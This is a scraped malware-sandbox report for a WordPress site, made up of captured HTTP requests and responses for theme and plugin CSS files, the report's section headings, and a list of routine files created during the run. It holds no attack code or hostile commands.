2025-01-09 12:19:15 UTC	3211	IN	Data Raw: 0a 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 48 45 41 44 49 4e 47 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d Data Ascii: /* ======================================================================================================================================================HEADING============================================================================================

Timestamp	Bytes transferred	Direction	Data
2025-01-09 12:19:15 UTC	634	OUT	GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/iconlist/iconlist.css?ver=6.0.9 HTTP/1.1 Host: www.cipassoitalia.it Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.cipassoitalia.it/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 12:19:16 UTC	292	IN	HTTP/1.1 200 OK Server: aruba-proxy Date: Thu, 09 Jan 2025 12:19:16 GMT Content-Type: text/css Content-Length: 3712 Connection: close Vary: Accept-Encoding Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT Accept-Ranges: bytes X-ServerName: webx.aruba.it Alt-Svc: h3=":443"; ma=86400
2025-01-09 12:19:16 UTC	3712	IN	Data Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 49 43 4f 4e 4c 49 53 54 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d Data Ascii: /* ======================================================================================================================================================ICONLIST============================================================================================

Timestamp	Bytes transferred	Direction	Data
2025-01-09 12:19:16 UTC	609	OUT	GET /wp-content/themes/enfold/css/avia-snippet-site-preloader.css?ver=6.0.9 HTTP/1.1 Host: www.cipassoitalia.it Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.cipassoitalia.it/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 12:19:16 UTC	292	IN	HTTP/1.1 200 OK Server: aruba-proxy Date: Thu, 09 Jan 2025 12:19:16 GMT Content-Type: text/css Content-Length: 2178 Connection: close Vary: Accept-Encoding Last-Modified: Mon, 18 Mar 2019 15:16:34 GMT Accept-Ranges: bytes X-ServerName: webx.aruba.it Alt-Svc: h3=":443"; ma=86400
2025-01-09 12:19:16 UTC	2178	IN	Data Raw: 0a 2f 2a 73 69 74 65 20 70 72 65 6c 6f 61 64 65 72 3a 20 68 74 74 70 3a 2f 2f 70 72 6f 6a 65 63 74 73 2e 6c 75 6b 65 68 61 61 73 2e 6d 65 2f 63 73 73 2d 6c 6f 61 64 65 72 73 2f 20 2a 2f 0a 2e 61 76 2d 73 69 74 65 6c 6f 61 64 65 72 2d 77 72 61 70 7b 0a 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 0a 74 6f 70 3a 30 3b 0a 6c 65 66 74 3a 30 3b 0a 72 69 67 68 74 3a 30 3b 0a 62 6f 74 74 6f 6d 3a 30 3b 0a 77 69 64 74 68 3a 31 30 30 25 3b 0a 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 7a 2d 69 6e 64 65 78 3a 20 31 30 30 30 30 30 30 3b 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 0a 7d 0a 68 74 6d 6c 2e 61 76 2d 70 72 65 6c 6f 61 64 65 72 2d 61 63 74 69 76 65 7b 7d 0a 68 74 6d 6c 2e 61 76 2d 70 72 65 6c 6f 61 64 65 Data Ascii: /site preloader: http://projects.lukehaas.me/css-loaders/ /.av-siteloader-wrap{position: fixed;top:0;left:0;right:0;bottom:0;width:100%;height:100%;z-index: 1000000;background: #fff;display:none;}html.av-preloader-active{}html.av-preloade

Timestamp	Bytes transferred	Direction	Data
2025-01-09 12:19:16 UTC	626	OUT	GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/menu/menu.css?ver=6.0.9 HTTP/1.1 Host: www.cipassoitalia.it Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.cipassoitalia.it/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 12:19:17 UTC	292	IN	HTTP/1.1 200 OK Server: aruba-proxy Date: Thu, 09 Jan 2025 12:19:17 GMT Content-Type: text/css Content-Length: 4481 Connection: close Vary: Accept-Encoding Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT Accept-Ranges: bytes X-ServerName: webx.aruba.it Alt-Svc: h3=":443"; ma=86400
2025-01-09 12:19:17 UTC	4481	IN	Data Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 53 55 42 4d 45 4e 55 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d Data Ascii: /* ======================================================================================================================================================SUBMENU=============================================================================================

Timestamp	Bytes transferred	Direction	Data
2025-01-09 12:19:17 UTC	634	OUT	GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/promobox/promobox.css?ver=6.0.9 HTTP/1.1 Host: www.cipassoitalia.it Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.cipassoitalia.it/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 12:19:18 UTC	292	IN	HTTP/1.1 200 OK Server: aruba-proxy Date: Thu, 09 Jan 2025 12:19:17 GMT Content-Type: text/css Content-Length: 1294 Connection: close Vary: Accept-Encoding Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT Accept-Ranges: bytes X-ServerName: webx.aruba.it Alt-Svc: h3=":443"; ma=86400
2025-01-09 12:19:18 UTC	1294	IN	Data Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 50 72 6f 6d 6f 20 42 6f 78 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d Data Ascii: /* ======================================================================================================================================================Promo Box===========================================================================================

Timestamp	Bytes transferred	Direction	Data
2025-01-09 12:19:18 UTC	660	OUT	GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_layerslider/slideshow_layerslider.css?ver=6.0.9 HTTP/1.1 Host: www.cipassoitalia.it Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.cipassoitalia.it/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 12:19:19 UTC	292	IN	HTTP/1.1 200 OK Server: aruba-proxy Date: Thu, 09 Jan 2025 12:19:19 GMT Content-Type: text/css Content-Length: 4907 Connection: close Vary: Accept-Encoding Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT Accept-Ranges: bytes X-ServerName: webx.aruba.it Alt-Svc: h3=":443"; ma=86400
2025-01-09 12:19:19 UTC	4907	IN	Data Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 4c 61 79 65 72 20 53 6c 69 64 65 72 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d Data Ascii: /* ======================================================================================================================================================Layer Slider========================================================================================

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report http://cipassoitalia.it

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

HTML

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\SpgOJ[1].mp4

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_02soceqj.gmq.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2fhupfkc.1n3.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dd2mn0gt.epv.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uxr0wzma.aoy.psm1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 163

Chrome Cache Entry: 164

Chrome Cache Entry: 165

Chrome Cache Entry: 166

Windows Analysis Report
http://cipassoitalia.it

Timestamp	Bytes transferred	Direction	Data
2025-01-09 12:19:19 UTC	642	OUT	GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/testimonials/testimonials.css?ver=6.0.9 HTTP/1.1 Host: www.cipassoitalia.it Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.cipassoitalia.it/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 12:19:20 UTC	292	IN	HTTP/1.1 200 OK Server: aruba-proxy Date: Thu, 09 Jan 2025 12:19:20 GMT Content-Type: text/css Content-Length: 6251 Connection: close Vary: Accept-Encoding Last-Modified: Mon, 18 Mar 2019 15:16:32 GMT Accept-Ranges: bytes X-ServerName: webx.aruba.it Alt-Svc: h3=":443"; ma=86400
2025-01-09 12:19:20 UTC	6251	IN	Data Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 54 65 73 74 69 6d 6f 6e 69 61 6c 73 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d Data Ascii: /* ======================================================================================================================================================Testimonials========================================================================================

Timestamp	Bytes transferred	Direction	Data
2025-01-09 12:19:20 UTC	605	OUT	GET /wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=6.6.1 HTTP/1.1 Host: www.cipassoitalia.it Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.cipassoitalia.it/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 12:19:21 UTC	293	IN	HTTP/1.1 200 OK Server: aruba-proxy Date: Thu, 09 Jan 2025 12:19:20 GMT Content-Type: text/css Content-Length: 46555 Connection: close Vary: Accept-Encoding Last-Modified: Wed, 20 Nov 2024 02:52:50 GMT Accept-Ranges: bytes X-ServerName: webx.aruba.it Alt-Svc: h3=":443"; ma=86400
2025-01-09 12:19:21 UTC	16091	IN	Data Raw: 23 73 62 5f 69 6e 73 74 61 67 72 61 6d 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 20 30 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 7d 23 73 62 5f 69 6e 73 74 61 67 72 61 6d 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 63 6c 65 61 72 3a 20 62 6f 74 68 3b 7d 23 73 62 5f 69 6e 73 74 61 67 72 61 6d 2e 73 62 69 5f 66 69 78 65 64 5f 68 65 69 67 68 74 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a Data Ascii: #sb_instagram {width: 100%;margin: 0 auto;padding: 0;-webkit-box-sizing: border-box;-moz-box-sizing: border-box;box-sizing: border-box;}#sb_instagram:after{content: "";display: table;clear: both;}#sb_instagram.sbi_fixed_height{overflow: hidden;overflow-y:
2025-01-09 12:19:21 UTC	16384	IN	Data Raw: 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 7d 40 6d 65 64 69 61 20 61 6c 6c 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 7b 23 73 62 5f 69 6e 73 74 61 67 72 61 6d 2e 73 62 69 5f 63 6f 6c 5f 33 20 23 73 62 69 5f 69 6d 61 67 65 73 2c 20 23 73 62 5f 69 6e 73 74 61 67 72 61 6d 2e 73 62 69 5f 63 6f 6c 5f 34 20 23 73 62 69 5f 69 6d 61 67 65 73 2c 20 23 73 62 5f 69 6e 73 74 61 67 72 61 6d 2e 73 62 69 5f 63 6f 6c 5f 35 20 23 73 62 69 5f 69 6d 61 67 65 73 2c 20 23 73 62 5f 69 6e 73 74 61 67 72 61 6d 2e 73 62 69 5f 63 6f 6c 5f 36 20 23 73 62 69 5f 69 6d 61 67 65 73 20 7b 67 72 69 64 2d 74 65 6d 70 6c 61 74 65 2d 63 6f 6c 75 6d 6e 73 3a 20 72 65 70 65 61 74 28 32 2c 20 31 66 72 29 3b 7d 23 73 62 5f 69 6e 73 74 61 67 72 61 6d 2e 73 62 69 5f 63 Data Ascii: nt-size: 12px;}@media all and (max-width: 640px){#sb_instagram.sbi_col_3 #sbi_images, #sb_instagram.sbi_col_4 #sbi_images, #sb_instagram.sbi_col_5 #sbi_images, #sb_instagram.sbi_col_6 #sbi_images {grid-template-columns: repeat(2, 1fr);}#sb_instagram.sbi_c
2025-01-09 12:19:21 UTC	14080	IN	Data Raw: 6e 74 65 72 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 73 62 2d 65 6c 65 6d 65 6e 74 6f 72 2d 63 74 61 2d 69 6d 67 2d 63 74 6e 20 7b 77 69 64 74 68 3a 20 31 30 30 25 20 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6c 6f 61 74 3a 20 6c 65 66 74 20 21 69 6d 70 6f 72 74 61 6e 74 3b 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 20 21 69 6d 70 6f 72 74 61 6e 74 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 Data Ascii: nter !important;}.sb-elementor-cta-img-ctn {width: 100% !important;position: relative !important;float: left !important;display: flex !important;justify-content: center !important;align-items: center !important;margin-top: 50px !important;margin-bottom: 3

Timestamp	Bytes transferred	Direction	Data
2025-01-09 12:19:20 UTC	628	OUT	GET /wp-content/plugins/cookie-law-info/legacy/public/css/cookie-law-info-public.css?ver=3.0.5 HTTP/1.1 Host: www.cipassoitalia.it Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.cipassoitalia.it/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 12:19:21 UTC	292	IN	HTTP/1.1 200 OK Server: aruba-proxy Date: Thu, 09 Jan 2025 12:19:21 GMT Content-Type: text/css Content-Length: 3106 Connection: close Vary: Accept-Encoding Last-Modified: Fri, 25 Nov 2022 09:48:11 GMT Accept-Ranges: bytes X-ServerName: webx.aruba.it Alt-Svc: h3=":443"; ma=86400
2025-01-09 12:19:21 UTC	3106	IN	Data Raw: 23 63 6f 6f 6b 69 65 2d 6c 61 77 2d 69 6e 66 6f 2d 62 61 72 20 7b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 3b 0a 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 32 70 78 20 31 30 70 78 3b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 09 7a 2d 69 6e 64 65 78 3a 20 39 39 39 39 3b 0a 09 2f 2a 20 62 6f 78 2d 73 68 61 64 6f 77 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 35 29 20 30 70 78 20 35 70 78 20 35 30 70 78 3b 20 2a 2f 0a 09 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 09 6c 65 66 74 3a 30 70 78 3b 0a 09 66 6f 6e 74 2d Data Ascii: #cookie-law-info-bar {font-size: 15px;margin: 0 auto;padding: 12px 10px;position: absolute;text-align: center;box-sizing: border-box;width:100%;z-index: 9999;/* box-shadow:rgba(0,0,0,.5) 0px 5px 50px; */display: none;left:0px;font-

Timestamp	Bytes transferred	Direction	Data
